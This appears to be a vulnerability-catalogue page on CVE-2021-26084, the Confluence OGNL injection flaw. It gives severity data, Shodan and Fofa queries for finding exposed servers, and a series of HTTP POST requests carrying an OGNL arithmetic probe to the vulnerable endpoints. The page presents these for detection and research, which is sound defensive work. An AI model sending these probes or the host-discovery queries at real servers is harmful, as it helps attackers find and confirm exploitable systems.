🔙 목록으로 돌아가기

CVE-2021-26084: Confluence Server - Remote Code Execution

TitleConfluence Server - Remote Code Execution
AuthordhiyaneshDk,philippedelteil
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
RemediationApply the latest security patches provided by Atlassian to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.9444
CVE IDCVE-2021-26084
CWE IDCWE-917
Shodan Queryhttp.component:"Atlassian Confluence"http.component:"atlassian confluence"
Fofa Queryapp="atlassian-confluence"
Tags cve2021 cve rce confluence injection ognl kev atlassian vkev vuln

🔍 Vulnerability Description

Confluence Server and Data Center contain an OGNL injection vulnerability that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options.

🌐 HTTP Request

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /confluence/pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /wiki/pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.2
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/createpage-entervariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /template/custom/content-editor HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/doenterpagevariables.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /users/user-dark-features HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_9 rv:6.0; ms-MY) AppleWebKit/532.11.2 (KHTML, like Gecko) Version/5.0 Safari/532.11.2
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /templates/editor-preload-container HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/createpage.action?spaceKey=myproj HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /pages/templates2/viewpagetemplate.action HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb
POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Content-Length: 47
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close

queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26084.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-26084.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A